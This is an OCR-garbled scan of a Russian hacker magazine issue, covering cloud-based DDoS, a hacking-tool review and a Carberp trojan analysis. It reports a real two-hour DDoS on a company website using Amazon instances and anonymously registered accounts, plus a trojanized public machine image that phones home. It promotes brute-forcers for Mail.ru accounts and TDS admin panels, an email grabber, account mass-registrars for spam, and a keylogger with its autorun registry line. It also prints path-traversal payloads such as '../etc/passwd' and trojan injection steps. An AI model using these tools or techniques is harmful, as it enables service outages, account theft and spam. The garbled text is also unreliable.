Символы английского алфавита (ю\/-сазе) и цифры (от 1 до 12 символов) 


Символы английского алфавита (1о\/-сазе) и цифры (от 1 до 1 символов] 


Символы английского алфавита (ю\/-сазе) и цифры (от 1 до 10 символов) 297 суток 
Символы английского алфавита (ю\/-сазе) и цифры (от 1 до 9 символов) 1] суток 


ТАБЛИЦА 2 


Необходимый ресурс СТОИМОСТЬ 


Трафик (м-+оц} (Гб) 
ТАБЛИЦА 3 


Работа одного пЗапсе (час) $0,085 -. 3 рубля 


ми способами пытаются обойти ограничения парольной политики 
и использовать простой пароль. 

В таблице 2 представлены необходимые для генерации различ- 
ных радужных таблиц ресурсы. 

Как видно, генерация «универсальной» радужной таблицы для 
паролей, состоящих из символов английского алфавита (1ю\м/- 
сазе) и цифр (от 1 до 12 символов] занимает целый миллениум и 
порядка 80 млн долларов. Для частного лица это на грани фан- 
тастики, но для государств и даже крупного бизнеса — вполне 
подъемно. Если же задаться целью, то используя всего 20 000 
серверов вместо 20, можно создать такую таблицу всего за год. 


Облачный 0005 

В первую очередь необходимо разобраться со схемой проведе- 
ния эффективной ДДоС-атаки на сервер/сервис. Гаранты эффек- 
тивности ДДоС-атаки: 

® большое количество атакующих машин; 

® «умная» нагрузка атакуемой системы. 

|аа5 в скопе со специализированным ООо$-софтом — этой убой- 
ная конструкция, позволяющая осуществлять очень эффективные 
ДДЛоС-атаки. Сервис |аа$ удовлетворяет пункт о необходимом 
множестве атакующих машин. Специализированный софт должен 
отвечать за «умную» нагрузку атакуемых систем с целью «отказа 
в обслуживании». 

Специалистами нашей компании было разработано техническое 
задание для подобного рода софта. Гребования к распределен- 
ной системе нагрузочного тестирования: 

® мультиплатформенность (ЧпихЛ/\п9о\м$}; 

® модульность; 

® централизованное управление (клиент<->сервер). 
Необходимые на первых парах модули: 

® 5УМ Ноо4д 

® 0ШР Цоод 


ТАБЛИЦА 4 


Необходимый ресурс 


$0,150 - 5 рубля 


Качество 


== 


Требуемое 
время 


Стоимость 


[Зчава [509 
А тод___ [$23632 
[275 суток $75404 
[1046 лет [58091957 
[27 лет [5469126 
[297 суток $18884 
[поток [$965 


® [СМР Ноо4 

® АррИсайоп И оод 

® НТГР/НТТРС (СЕТ/РОЗТ] 
» ГТР 

® ЭМТР/5МТР+55/ТЕ5 

® РОРЗ/РОРЗ+55Е 
Параллельно с разработкой распределенной системы нагрузоч- 
ного тестирования, мы провели испытания уже существующего 
софта для нагрузочного тестирования. Большая часть публичного 
ПО не удовлетворяла пункту централизованного управления, 

в связи с чем пришлось самостоятельно писать управляющие 
скрипты для централизации управления атакующими приложе- 
НИЯМи. 

Из публичных утилит мы использовали два продукта: 

® Маизгарп (млм ретВе(.аУзес/тп?2/] — утилита для генерации 
трафика (как валидного, так и невалидного). В большинстве слу- 
чаев используется для проведения тестирования сетей \о|Р или 
больших сетей, а также для проведения аудита безопасности в 
отношении систем, возможно уязвимых для специфических атак 
на отказ в обслуживании. 

® 5ом/Ро${.р( (аналог для 5©\/ ог НТТР Поб Тоо — небольшой 
скрипт, позволяющий провести атаку на протокол НТТР через 
РОЗТ-запросы к веб-серверу, с целью вызвать отказ в обслу- 
живании (исчерпав максимальное количество подключений к 
серверу]. Более подробное описание данной атаки представлено 
на странице 5о\/-отз НТТР Поб (Ва.сКег$.ога/6(09/20090617/ 
5юмог5-ВИр-405/]. Аналогичный способ АррИсаНоп Е 09 

для протокола НТТР через РОЗТ-запросы с использованием 
облачных вычислений был представлен Дэвидом Брайеном и 
Михаилом Андерсоном на хакерской конференции Ое{соп 18 (61. 
у/1955г]. Они реализовали функционал распределенной системы 
АррИсаНоп Е(юод’а для протокола НТТР, но, к сожалению, прак- 
тический результат в виде «отказа в обслуживании» реального 
сервера [парнями был использован для презентации один из 
веб-серверов Оесоп’а} не был получен, хотя задумка в теории 
действительно должна была отлично работать. К такой заминке 
могло привести либо недостаточно эффективное осуществление 
АррИсаНоп Еооад, либо недостаточное количество атакующих 
серверов. В разработке скрипта 51ом/Ро$1.р{ основной качествен- 
ной характеристикой являлось эффективное осуществление 
АррИсаНоп Ноод. В итоге, скрипт позволяет создать и поддер- 


Стоимость 


Работа одного п$апсе $0,085 -- 3 рубля/час 
Трафик (п-++оий (Гб) <$0,150 - <4 рублей 
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<7 рублей/час 
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Генерация Катро\м {а е$ 


живать одновременно более 900 подключений к атакуемому 
веб-серверу с одной атакующий машины. Такие характеристики 
позволяют с помощью всего одной атакующей машины обе- 
спечить атаку на «отказ в обслуживании» для большинства веб- 
серверов, работающих под управлением веб-сервера Араспе. 
Ведь директива МахСИеп{$ по умолчанию равна 256: веб-сервер 
обеспечивает возможность работы только с 256 пользователям 
одновременно. Веб-сервер 115 (ММпдо\из 2003 5егуег), в отличие 
от АрасВе, использует значение по умолчанию, равное приблизи- 
тельно 20 000. 

Разработка системы распределенного нагрузочного тестирова- 


ния была проведена в соответствии с возможностями сервиса 
|за5 от провайдера Атахоп (а\/5.агпахоп.согп]. Выбор пал на 
данного провайдера не случайно. Во-первых, Атагоп — доста- 
точно быстро развивающийся крупный проект, позволяющий 
своим пользователям одними из первых получать доступ к новым 
«фичам» функционала облачных вычислений. Во-вторых, после 
проведения сравнения бюджета на реализацию атак на отказ в 
обслуживании, который приведен ниже в таблице 3, оказалось, 
что сервис от Ататоп наиболее демократичен и гибок. 
Технические характеристики запускаемого [|п${апсе, выступающе- 
го в роли атакующего звена, представляют собой следующее: 

® система х86/х64 [1 СРИ): 

® 613 Мб ОЗУ; 

» ТОТ НОО. 

Технические характеристики |п$апсе были выбраны минималь- 
ными в силу того, что для реализации атаки на «отказ в обслужи- 
вании» приоритет отдается количеству атакующих машин, а не 
их вычислительным характеристикам. Каждый [п${апсе снабжен 
каналом с пропускной способностью 100 МЬ/5, поэтому проблем 


в скорости передачи данных до атакуемого сервера теоретически 
быть не должно. 

В первую очередь было очень интересно увидеть реальную мощ- 
ность предполагаемого «ботнета» на облачных технологиях. Для 
теста был выбран сценарий упомянутого Брайена Андерсона, 


НПР Оо$ веб-сайта с помощью одного инстанта 


——_ ИИ 


. хх мир:// 
Р_ Самые популярные @) Сеид Мамед > (ме Нез 


{1 А\М/$ Мападегтлег( Сопзое 


`} Загрузка... х 
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представляющий из себя реализацию атаки на «отказ в обслужи- 
вании» для НТТР-сервера. 

Как было выяснено, связка 1 «п$апсе» + скрипт 5 о\м/Ро${.р( 
позволяет эмулировать более чем 900 клиентов веб-сервера. 
Таким образом, этой связки достаточно, чтобы вывести из строя 
любой веб-сервер, поддерживающий максимальное число под- 
ключений менее чем 900. Бюджет, необходимый для реализации 
такой атаки сводится к минимуму за счет потребления лишь 
компьютерного времени, а не ресурсов и трафика. Себестоимость 
атаки для таких веб-серверов — меньше 7 рублей в час! (см. 
таблицу 4] 

При тестировании в реальных условиях мишенью выступал веб- 
сайт, обслуживаемый сервером 15. Балансировка нагрузки была 
разделена на два [Р-адреса. Таким образом, чтобы положить этот 
сервер, потребовалось создать более чем 20 000 подключений 

к каждому из |Р-адресов. Настройки атакуемого веб-сервера 
были установлены по умолчанию. В итоге, для обеспечения 

всех условий для удачной атаки «отказ в обслуживании» было 
запущено 46 «п${апсе», каждый из которых эмулировал одно- 
временную работу 900 пользователей. Кстати, обычным пользо- 
вателям Атагоп позволяется работать одновременно только с 20 
«п${апсе». Чтобы полностью пройти путь плохого парня, заду- 
мавшего ОПо5-атаку, мы просто зарегистрировали три различ- 
ных аккаунта. Кроме этого, для регистрации нам понадобилось 
три сим-карты. Естественно, были куплены анонимные карты с 
балансами 300 рублей — причем абсолютно легально. К каждой 
сим-карте была приобретена карта оплаты (Ргера!4 Сага Гог 
|п{егпеё 5Воррид) с балансами $5 — карта необходима при реги- 
страции на площадке Атагоп и верификации. В итоге, бюджет 


Троянизация АМ 
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Статистика использования паролей — 
в российских компаниях © 


Необходимый ресурс Качество 


Продолжительность 


ех\‹ 


Ы Только цифры (питетс] 


М Символы аыглийского алфавита в мижмем 
регистре (юмегарЬа) 


Ы Символы эмглийского алфэвита в мижнмем 
регистре и цифры (юммегаЮНа-питегс) 


М Симеолы эмглийского алфэвито в размых 
регистрах и цифры (пхафНа-питегк} 


Ы Символы аыглийского алфэвита в размых 
регистрах (така!рма) 


Ы Символы аыглийского алфавита в верхмем 
регистре и цифры (э1рЪа-гилтег К) 


Ы Симеолы русского алфавите в нижнем 
регистре (омега! р з-гиз) 


Ы Прочие наборы 


Стоимость 


900 рублей 


Работа одного пЗапсе $0,085 * 46 *2 = -- 240 рублей 
Трафик йп+оий (Гб [30/5 - <8 рублей 


Таблица 5 


для атаки «отказ в обслуживании» на веб-сайт достаточно круп- 
ной компании составил всего 1150 рублей. Детальная стоимость 
представлена в таблице 5. 

Атака проводилась в отношении веб-сервера на протяжении 
двух часов, чего вполне достаточно для ощутимых потерь в 
сфере интернет-бизнеса. 


Трояны в |п$фапсе 


Удобство облачных сервисов заключается также в гибкости 
выбора ОС и ее компонентов через приятный веб-интерфейс. 
Пользователь может использовать как стандартные решения, 
предоставленные провайдером, так и образы ОС, созданные 
пользователями провайдера. Например, сервис от Амазон 
очень активно использует данную систему. Именно в ней и кро- 
ится опасность — провайдер не гарантирует того, что образы 
систем, предоставленные пользователями для общего исполь- 
зования, не выполняют никаких скрытых действий: например, 
не ведут логи, не копируют личную информацию, не становятся 
частью ботнета, не распространяют вредоносное ПО. 
Проведенные тесты показали, что многие пользователи дей- 
ствительно не следят за такими вещами. Для проведения теста 
потребовалось: 

® создать образ популярной ОС в формате АМ! и выложить его в 
открытый доступ в интерфейс Амазона; 

® составить хорошее описание настроенной системы (установ- 
ленный софт, полезные «плюшки» и т.д.}; 

Кроме этого мелким шрифтом в описании программы было 
написано, что при старте этого образа ОС в автоматическом 
режиме происходит НТТР-СЕТ-отстук на сервер, собирающий 
статистику. Хотя об этом можно было и не говорить в описании 
образа, мелкий текст не испортил картины. Как результат — 
более 1000 отстуков за месяц! Представь, какой хороший и бес- 
платный ботнет можно собрать. Размещаешь протрояненный 
образ с красивым описанием — пользователи устанавливают 
его, а ты анонимно пользуешься их серверами за их же деньги. 


Аризе-практика 


Теоретически, оперативное реагирование на жалобы должно 
быть правилом для любого провайдера. В реальности же все 


> 070 


1150 рублей 


обстоит несколько иначе. Проведя небольшое исследование, 
было выявлено, что даже серьезные провайдеры облачных сер- 
висов (например, Атагоп], не спешат реагировать на абизе и 
расследовать инциденты. Фактически, дело не заходит дальше 
учета сообщений об инцидентах. Во-первых, чтобы инцидент 
был рассмотрен провайдером, необходимо предоставить, поми- 
мо |Р-адреса атакующего, точную дату и время атаки. После 
предоставления необходимой информации о злоумышленнике, 
переписка с провайдером будет продолжаться. Но это будет 
односторонняя переписка: провайдер с радостью выслушает 
ответы на интересующие его вопросы, но вот на твои — не отве- 
тит, за редким исключением, любезно игнорируя. 


Что делать в случаях атак 


При первом обращении к провайдеру, служба безопасности 
просит предоставить следующую информацию: 

® [Р-адрес атакующего; 

® [Р-адрес жертвы; 

® атакуемый порт и протокол, по которому происходила атака; 

® точную дату, время и временную зону жертвы; 

® логи с машины жертвы, подтверждающие факт атаки [не более 
4 Кб}; 

» контактные данные. 

Крайне важны точное время атаки и временная зона атакуемой 
машины. Это связано с тем, что |Р-адрес атакующего может 
менять владельца более одного раза за сутки, что усложняет 
идентификацию злоумышленника. Кроме этого следует точно 
идентифицировать вид атаки и создать слепок лог-файлов 
атакуемого сервиса для предоставления службе безопасности 
провайдера. 


Заключение 


Облачные технологии, предоставив пользователям доступ к 
огромным вычислительным возможностям, также дали возмож- 
НОСТЬ ПЛОХИМ Парням использовать свои мощности в корыстных 
целях. Панацеи От этого. не существует Но, зная возможные 
векторы атаки с использованием облачных вычислений, МОЖНО 
защитить свои информационные ресурсы от возможных инци- 
дентов. 7 
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(495) 78-888-18 (для Москвы), 8-800-2000-000 (бесплатно для регионов России) 
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Программа: МИспхюо 
ОС: * п/п 
Автор: ИЗМ ИСИ 
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веенннннеаннннаеаннннеея: ЕЕ ВЕБЕ ЗЕЕ ВЕН 


Все включено! 


Первым в нашем обзоре выступает приме- 
чательный хакерский комбайн, написанный 
мембером турецкой команды МаКаззаг Е Шса! 
НасКегна перле. Прога работает в интерактив- 
ном режиме и совмещает в себе функционал 
множества полезнейших утилит, начиная со 
сканера портов и заканчивая сканером [Е |- 
дорков. Разобраться с использованием сканера 
довольно просто, однако опишу для примера 
сценарий работы при поиске [Е | (оса[ Ее 
пс9е). Пример использования сканера: 


Тагде{ : Ир: //51%е.сот/1паех. 
рир?раве= 


# Примерные запросы для поиска | ЕТ, 
содержащиеся в сканере: 


../ефс/ра$$ма 
../../ефс/ра$х$ма 
../../../ефс/рах$ма 
ес - 
Ид. 


Абсолютно аналогично в интерактивном режиме 
можно брутфорсить МО5, находить дорки 5Ц1 - 
инъекций, грабить свежие прокси с сервиса 
ргохуй$1. пей ит.д. 


Перед началом работы со скриптом тебе могут 
понадобиться дополнительные перловые моду- 
ли, найти ихты также сможешь на нашем диске. 
Пример установки модуля Ваа::\/аИдае:[Р: 


са тоди1е$ 
са-Мет-КамтТР 00:25 
рег1 МакКей1е. РЕ 

таке & & тмаКе 1п$%а11 
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Программа: МКВг\е 

ОС: ММпаом/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег/ 7 

Автор: Рго, ВагК-ммеб.м/з 


= : =. Г - 
ГотУет ив | МЕВГИС 


Ва: 

[САМЛМОО\/\Тете\ВаЕХОО75О\Н | [—____] 
ПИН Е Е 
[САМЛМОСУИ5\Тетр\АаЗЕХ ОО 750АМ | [|] 


Зошсе: 


[САМИМООУ/5\Темр\Яа$ЕХ00.750\М о 


[САМЛМОО\/5\Тетр\Аа$ЕХОО-750АМ | [Г м] 
[вы Кель) [СЕ мы 


Брутим аккаунты Май.Ки 


На очереди еще один брутфорс для работы со 
всем известным сервисом МаЦ.Ки. Функционал 
и особенности брутфорса достаточно стандартны 
для такого рода софта: 


® многопоточность (максимум 150 
потоков); 

» поддержка прокси (НТТР/$О0СК$4/5); 

» встроенный генератор сорца; 

» удобная статистика в системном трее 
(один клик по иконке в трее — вывод 
краткой статы, двойной клик — вывод 

формы брута); 

® таймауты; 

» для работы требуется „МЕТ Егатемогк. 


Для начала работы с прогой тебе необходимо 
зайти в настройки и изменить следующие 
параметры: 


» Вай — файл с неподобранными аккаунтами; 
» 6004 — файл с боо4 (подобранными) 
аккаунтами; 

» 50игсе — список аккаунтов для брута, 
должен иметь вид ета11@та11.ги: 
ра$$мога; 

» Ргоху — список прокси для работы 
программы; 

» ТИгеаа$ — число потоков; 
Т1теб0и* — время подключения к серверу 


Хакерский 
сот от 
БаскпаГов 


(по истечении этого времени прокси 
меняется); 

» 0е11т1{ег — разделитель спика $оигсе: 
<Ё051п> :<Ра$$мога>; 

» Туре Ргоху — тип используемых проксиков. 


Далее тебе может понадобиться генератор 
сорцев. В работе с ним также нет ничего 
сложного: в левый лист заносим свой список 
мыл, в правый — список паролей. Далее 
жмем на кнопку «Сепега{е» и наблюдаем 
готовый список Зочгсе. 1х4. 

Также автор брутфорса упоминаети об одном 
баге своего творения: при использовании 
НТТР Ргоху с каждым аккаунтом в логе со- 
бытий будет выводиться производственная 
ошибка — в ней нет ничего страшного. 


Программа: М@гаЬ 

ОС: МЛпаом/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег/ / 

Автор:Вобеап 
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Грабим Май.Ки 


Авотиеще одна прога для работы с Мац.Ки. 

На сей раз это граббер мейл-адресов, который 
пригодится тебе в сочетании сописанным выше 
МКВгще`ом. Сам процесс сбора мыльников 
проходит с помощью бага в сервисе о{\е{.ппац. 
ги, который показывает все адреса пользовате- 
лей в открытом виде. Особенности граббера: 


» работа в одном потоке; 
» проверка на дубликаты; 
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» иконка и возможность свернуть в трей; 
» возможность выставления таймаута; 

» подробный лог работы; 

» возможность выбора разделов для 
граббинга в окне «Рог бгабБ» (например: 
{г1епа$, аифо, Би$1пе$$, соипфг1е$, 
та21с, ге1ах, Коод ит.д.). 


После окончания работы граббераутебя будет 
огромный список мыльников, которыеты впол- 
не сможешь использовать в своих корыстных 
целях. 


Программа: Кеа!оддег 

ОС: ММпаом/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег// 

Автор: Мап32 


Правильный кейлоггер 


Встречаем — кейлоггер КеаЦоддеготучаст- 
ника форума Гискау.ги Уап32. Как понятно из 
названия, данная программа предназначена 
для скрытого наблюдения за компьютером и 
мониторинга активности пользователя. Софти- 
на реализует всю стандартную для кейлоггеров 
функциональность: прописывается в автоза- 
грузке, записывает нажатия клавиш влюбой 
раскладке и складывает отчеты с заданной ре- 
гулярностью на ЕТР-сервер либо на специаль- 
ный рЮр-гейтв виде РОЗ$Т-запросов. В реестре 
логгер прописывается следующим образом: 


НКСУ\ $оРмаге\М1сгоз$о+\иМ1паом$ \ 
Сиггеп\ег$1оп\Кип :Апф\1г 

с: \Чоситепт$ апа зе{{1п5$\аЯ@т1п\1оса1 
5е{{1п55\арр11са{1оп дафа\ап®\1г.ехе 


Автор программы будет рад ответить налюбые 
вопросы втопике на форуме ЕисКА\: Би. у/ 


ИС[5С. 


Программа:ТО5 КЙег 
ОС: *пх/МИП 
Автор: дапе|_ 1024 


Чаппи: — Ире 5 Бгоыве 


Справка 


файл Правка Вид Терминал 
рег\ 195 Бгитег.р\ 


[705 КИЛег] соде4 Бу Фап1е\т 1024 
[*] 105 туре: 51пр\е Т05 
[*] Вгыте $Тагте9 аЕ ТАу Ашу 19 16:48:56 2019 


[=] {те Т0адеЧ: 105 

[*] Рабзмога5 10240: 32 

[1] Но5Е: р: /ИФоць ес {ск . 1пТо/1п9ех.рир Ра55мого: 91м2е3 
[1] нове: Неер: иирогпорисег. сои /1пдех.рАр Разбнога: Тебе 


| ЗТатиз 190.0% Зрееф: 10 рр 
\ Вгите 14п45е9 ат ТВиы Ад 19 16:54:43 2910 


Брутим ТО 


ХАКЕР 08 /151/ 2011 


10$ КЩег — это перловый скрипт, предна- 
значенный специально для массового брута 
админок популярных скриптов распределения 
трафика [ТО5). В данный моментподдержива- 
ются две тдски: эитр(е ТО$ и Адуапсеа ТО5. 
Конфигпрограммы выглядит следующим об- 
разом: 


ту ФЕЙ = 20; # кол-во потоков 
ту $Е49$_+уре = 90; 
#0 — $1тр1е 105; 1 — Адуапсеа Т0$ 


В файле {4$ должны содержаться адреса 
админок 105$, ав файлах [одт.(Х и раз$.(х{ — 
соответственно логины и пароли для брутфор- 
са. Во время брута на экран выводится скорость 
и текущий статус процесса. 

Скрипт обладает многопоточностью, по отзывам 
пользователей скорость может доходить до де- 
сяти запросов в секунду. Автор также приводит 
и дорки для поиска тдсок в гугле: 


» 51тр1е ТО$ — «1пиг1:50.рИр?$1а=» 
» Аауапсеа Т0$ — «ои*.рИр?$_19=» 


Проверить на валидность напарсенные из по- 
исковиков ссылки можно с помощью специаль- 
ного скрипта {4$_спескКег.р(, который ты также 
сможешь найти на нашем диске. Любые пред- 
ложения и пожелания ты можешь оставлять в 
топике на Ачате Би. у/ппм/_4ВО. 


Программа: КаптЫег Кеддег 

ОС: \ММпаом/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег// 

Автор: (4е7 ВИ \а 


ЕН Керрег | 


Массовая регистрация ящиков на 
РатЫеге 


Теперь приступим к свежему софту от посто- 
янного участника нашей рубрики /4е7 Ва. 
Первая из представленных софтин — это про- 
грамма для массовой регистрации ета ов на 
сервисе Катщегсги. Программа имеет многопо- 
точный режим (в том числе через зосК$), кроме 
этого она распознает капчу с помощью сервиса 
Апидате. Логины и пароли для мыл генерируют- 
ся автоматически, а результат работы програм- 


ма записывает в файл 9004.41, ведя при этом 
подробный лог. Официальная страница реггера 
— Ы. У /253. Там же можно задать любые свои 
вопросы автору. 


Программа: |СО МиЙгедадег 

ОС: \МЛпаоми/$ 2000/ХР/2003 5егуег/ 
\М$а/2008 5егуег// 

Автор: (4е7 В! \а 


Ге СОМ АТеррег 


Ц&Е ОР ата 5: 


Ргоху 


ФМОМЕ  С50Ск5а 
(2 500К55 


Тигеа05* 


АпНода{е Кеу: 


Праграмьгы СО Разлача номеров” — 


| Араенные ИСО) номера 


Много асек не бывает 


Вторая прога от /4е7 В \Уа — это массреггеруи- 
нов через сервис с9.сога, который был написан 
совсем недавно и, в отличие от другого подоб- 
ного софта, еще долго не утратит свою актуаль- 
ность. Особенность реггера состоит втом, что 
процесс регистрации асечных номерков проис- 
ходит с помощью списка етац-адресов (здесь 
тебе и может пригодиться Кап" ег Кеддег). Так 
как в прошлом году ася полностью изменила 
свои системы ретрива и регистрации, теперь 
зарегать аськуты сможешьтолько с валидным 
мейлом, с помощью которого регистрация и под- 
твердится. Другие особенности утилиты: 


® многопоточность; 
® распознавание капчи через антигейт; 

® прокси и соксы; 

» подробные логи работы программы; 

» формат файла с мылами: ета11; пароль 
(по одному в строке); 

» сохранение всех зарегистрированных 
асек в файл =00а.1х*; 

» подтвержденная работа с мейлами сле- 
дующих сервисов: та11.ги (БК.ги, 1пбох. 
ги, 115%.ги), уапаех.ги, гамЬ1ег.ги; 

» теоретическая работа со всеми мыльными 
сервисами, РОР-сервер которых выглядит 
как рор. $1%е .аота1п. 


На выходеты получишь список валидных све- 
жезареганных асек, которые идеально подойдут 
для рекламной рассылки :]. За поддержкой об- 
ращайся прямиком кавтору: Б\(у/к8уО0 21. == 
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Ш № Григорьев Максим, Ма[\Маге Апа[у${ бгоир-1В [($Ит_909@тац.ги) 
Бутенко Александр, Ма[маге Апа(уз{ бгоир-1В Ве еп @адтаЦ.сот) 


Я знании 


47 [РЕ т 
' } | 


7 | \\ММп32/ Го|апО)омупоадег.СагЬег 


`ВЕМЕКАТОМ 
САКВЕКР 


Изучаем все секреты трояна 
У\п32/Тто]апдомип(оадег.Сагоегр 


© Гроян \Ип3 2/Сагегр появился не так давно, в первой половине 2010 
года, и можно сказать, что этот вирус имеет неплохой потенциал. Он 
использует достаточно большое количество необычных трюков для 
обхода эвристических алгоритмов современных антивирусов и 
сканеров. «Полезная» нагрузка же делает его сравнимым с /еи$'0м 
или эруЕуе. В этой статье мы рассмотрим некоторые особенности 
данного троянца. 


С чего же все началось? помощи плагина Вто для ША, мы обнаружили, что код был 
Когда мы принялись исследовать этого зловреда, из пяти сем- идентичным. Посмотрев внимательнее на файлы в редакторе 
плов, посланных на Мги$ Тофа[.согп, только один определялся Н|ЕМ/, картина стала проясняться. Во-первых, отличались неко- 
многими антивирусами, у остальных четырех семплов количество торые поля РЕ-заголовка. Во-вторых, в первой секции « {еж 
детектов было гораздо меньшим. Сравнив все экземпляры при не было кода вообще, а единственное, что там было прописано, 
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\\Мп32/тоап)о\м/итоааег.Сагрегр 


Ш СМЫЕНД 1.0.15.15252 
Вос КММа№»аге ]> У> 


\\Мп32/ТтоапОо\му/поааег.Сагбегр 


ых] 


К буяет 


САМИМОО\ 5 \Е хрогег Е ХЕ 616] мо. ИМ чцегО нео е + 6 


САМЛМОО\/С\Е хррюге. ЕХЕ[1616] ий. ЧИ езитеТ мезд + В 
С.\Мамаге\ СМЕЛА. ехе[2504] и. ИМО четОнесюотуЕ1е + 6 
С:\Мамаге\СМЕР.ехе[2504] и ИМ езитет геад + Б 


СЛАЕМЕАУМЬ \Зузтета\ргосехр.ехе[2858] му. ЗМ четОнесоту[йе + Б 
СЛАЕМЕАУМЕ \Зузтета \ргосехр.ехе[2853] и. ЗИМА езитетТ Игезд + Б 
СЛАЕУЕАЗИМЕ\ООБ\ОНТОВЬ.ЕХЕ [3308] пу. ИМ ЮцегуОгесцогуР1е + Б 
С^ААЕУЕАЗУМЕ\ООБОЦТОВС.ЕХЕ[3308] илу И. ИМ А езитеТ геад + 6 


А вот антируткит СМЕК все-таки заметил что-то неладное 


— имена двух библиотек (Кегпе[32.9Ц и ад\ар!32.9Ц), а также 
название одной функции (Едца(Ргейх5!4], которые окружены 
случайными последовательностями байтов. Эти данные исполь- 
зуются при распаковке вируса. Ну и наконец, отличались табли- 
цы релокаций. Предпоследние секции «.геос» были различного 
размера, и сами значения релоков также не совпадали. Именно 
эти три отличая позволяли данному вирусу обходить сигнатуры. 
Также, помимо пяти семплов одной версии зловреда, были 
исследованы еще две версии, которые отличались друг от 
друга как механизмами защиты, так и своим функционалом (см. 
таблицу 1). 

Наконец мы приступили непосредственно к исследованию. При 
анализе вирусов часто приходится сталкиваться со сложностями 
при снятии навесной защиты из-за различных антиотладочных 
приемов и обфускации. Но с данным экземпляром проблем не 
возникло, его упаковщик снялся без особых усилий. Впрочем, 
самое интересное начинается дальше. 


Временные файлы 


При анализе этого зловреда мы сначала не поняли, зачем же он 
создает временные файлы, копируя в них стандартные библио- 
теки МИп4о\ми$ (гЕаЦ.аЦ, Кегпе[32.аЦ и м$2_32.9Ц]. Оказалось, что 
это делается для безопасности вируса. После создания копии 
библиотеки, он отображает ее к себе в память, находит нужные 
ему при работе функции и сравнивает первые 10 байт с теми, что 
находятся в импортированной библиотеке. Если они не совпада- 
ют, значит какая-то «недобрая» программа поставила хук на эту 
функцию, и вирус сразу восстанавливает эти 10 байт из ориги- 
нальной библиотеки, а точнее — из образа ее копии. Поэтому с 
уверенностью можно сказать, что желающие поизучать внутрен- 
ности Сагрегр’а мог\ут отложить АР! МопКог на дальнюю полку 
своего жесткого диска :]. 

Вызовы АР!-функций также сделаны с изюминкой. В программе 
присутствует механизм, который получает на вход константу, а 
на выходе высчитывает необходимый адрес. Конечно, этот под- 


Классификация компании ЕЗЕТ 


7С900774 4 Виез [08, 43, 99, 00] ‚ 
7900844 4 Вйез [С8. АЗ. 39. 00].. М 58501 
70900774 4 Виез [08.А3, 16,00] М ПАТ/ЕАТ 
70900844 4 Виез [С8, А9, 16, 00]... [7 бемсез 
7С900774 4 Виез [08, 43, 16, 00] 

7900844 4 Виез [С8. 43.15. 00].. М Модмез 
72900774 4 Виез [08,АЗ, 15, 00] № Руосеззез 
72900844 4 Виез [С8, 49, 15, 00] ... Та 


№ Пыапез 
| беглсез 
Г. Ведему 
Г. Ре 


Бра детв ча Прогруачевы, Гео, Де рннг НА 
— ресирел Иниериета, н Милен агережЕ иг. 


Оетерыянь- | сны и 
[=] [ее] [о6ю.. ] 


С: Дрекнвтия р задам Миле 


Прнаосаенеый | Пооминоы | Быстродействые | Сеть | Поьзоватены 


5 


ЗВЕВЕВЕНВЕНЕВЯНННЕЕ 


Бала ша стим Пг += 
[О олова ать инь веси п И еОВ-В НИ 


Забавно, что через ТазКМападег можно увидеть нашего 
«невидимк\» 


ход значительно затрудняет статический анализ зловреда, хотя 
также имеет и свои минусы — если поставить точку останова на 
конец функции расшифрования, то легко можно отследить после- 
довательность вызова функций, а написав парочку скриптов для 
ОЦуОБа и ГРА, можно восстановить их названия и без проблем 
статически исследовать код. В одной из исследуемых версий 
трояна также использовалось шифрование всех текстовых строк, 
используемых программой, что значительно затруднило анализ 
вредоносных возможностей. 


Завоевание новых территорий 


Во многих троянах код «полезной нагрузки» не выполняется при 
первом запуске — он инжектируется в какой-то уже работающий 
процесс и начинает действовать уже там. Данный вредонос — не 
исключение, и для внедрения он использует процесс ехр(огег.ехе. 
Только деЛлаегон. это очень необычно. 


Хеш файла 


641С4ЕЕ3047077231А92931075С20017 


0909213472469 А6 8ЕСА24Е49СС608 
74995 АЗЕО6Е12 6 ЗА4ЗЕТСЕ26 АЗ6ОЕЕВА 


Таблица 1. Отличие версий по функционалу и защитным механизмам 
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апОомипюааег.Сагоег 


МЛп32/ТгоГап- 
Бом/ипоасег. 


Сагбегр.\// 
но|ап 


Пакер 


Создание двух 
Метод инъекции 
НОП» 


объектов типа «$ес- 


ООО СООО О СООО 
ООО СОЯ СОНИ ОИ 
ООО ОО СЗО СИ 
вс ОИ СО ОИ 
функций 

ЗОО ООО ОИ СООО 
ИИ СИ ОИ 


\\Мтп32/То|апО)омиптоааег.Сагоег 


М3 2/ То 


МЛп32/ТгоГап- 
Оом/тоаадег. 
Сагрегр.Х то|ап 


\МЛп32/то|ап)ом/л- 
|оадег.Сагоегр.Х 
но|ап 


Создание двух 


объектов типа "бесНоп" Вызов ОцецеАРСТИгеач|) 


Таблица 2. Все средства защиты, применяемые нашим трояном 


Первым делом, процесс вызывает функцию Сгеа{еРгосез$ с 
выставленным флагом СКЕАТЕ_$У$РЕМОЕО, тем самым соз- 
давая новый, приостановленный дочерний процесс ехр(огег. 
ехе. Затем вызовом функции /м/Сгеае5есНоп создается объ- 
ект «секция» [БесНопОБ]ес{ — это часть памяти, которая может 
разделяться между разными процессами) со всеми возмож- 
ными правами (чтение, запись, исполнение}. Далее секция 
мапится в контекст трояна функцией /\мМар\МемОТ5есИоп и 
при помощи тетсру вредонос копирует свою распакованную 
копию в эту область памяти. После этого, секция отображается 
в контекст дочернего ехр[огегехе, и тем самым туда заносится 
вредоносный код. Но это еще не конец, ведь вредоносный код 
должен также выполниться ехрогег` ом. Для этого функцией 
Кеа9РгосезМетогу из процесса ехр[огегехе копируется место, 
где находится спроецированный исходный файл, в контекст 
вредоносной программы. Создается еще одна секция, которая 
сначала отображается в троянскую программу, а потом в нее с 
помощью тетсру копируется полученная из ехрогег’а часть 
памяти. Следующим шагом патчатся несколько байт на точке 


входа таким образом, чтобы происходил прыжок на вредоносную 


функцию. И наконец, секция отображается в контекст ехр(огег'а 
на то место, где раньше находился исходный образ. Теперь 

все готово для запуска дочернего ехрогег’а. Троян вызывает 
/м№Кезите Тйгеаад, тем самым запуская вредоносный код, уже 
находящийся в другом процессе. Получив управление в новом 
месте, СагБегр начинает работать в полную силу, запуская вре- 
доносные функции рауоа9`а и внедряясь во все запускаемые 
процессы. Естественно, во всех новых захваченных территориях 
вредонос также производит описанную выше проверку на нали- 
